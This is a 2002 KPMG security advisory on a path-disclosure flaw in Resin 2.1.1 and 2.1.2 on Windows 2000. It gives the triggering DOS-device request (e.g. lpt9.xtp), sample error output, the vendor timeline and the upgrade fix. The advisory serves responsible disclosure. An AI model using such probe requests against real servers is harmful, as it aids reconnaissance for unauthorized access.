-------------------------------------------------------------------- Title: Resin DOS device path disclosure BUG-ID: 2002033 Released: 17th Jul 2002 -------------------------------------------------------------------- Problem: ======== It is possible to disclose the physical path to the webroot. This information could be useful to a malicious user wishing to gain illegal access to resources on the server. Vulnerable: =========== - Resin 2.1.1 on Windows 2000 Server - Resin 2.1.2 on Windows 2000 Server Not Vulnerable: =============== - Resin 2.1.s020711 on Windows 2000 Server Details: ======== Requesting certain DOS devices, such as lpt9.xtp, results in an error message that contains the physical path to the web root. 500 Servlet Exception java.io.FileNotFoundException: C:\Documents and Settings\Administrator \Desktop\resin-2.1.1\resin-2.1.1\doc\aux.xtp (Access is denied) Vendor URL: =========== You can visit the vendor webpage here: http://www.caucho.com Vendor response: ================ The vendor was notified on the 22nd of May, 2002. On the 12th of July we verified that the problem was corrected in the latest build (s020711). Corrective action: ================== Upgrade to a newer version. This issue was first resolved in build s020711, available here: http://www.caucho.com/download/index.xtp Author: Peter Gründl (pgrundl@kpmg.dk) -------------------------------------------------------------------- KPMG is not responsible for the misuse of the information we provide through our security advisories. These advisories are a service to the professional security community. In no event shall KPMG be lia- ble for any consequences whatsoever arising out of or in connection with the use or spread of this information. --------------------------------------------------------------------
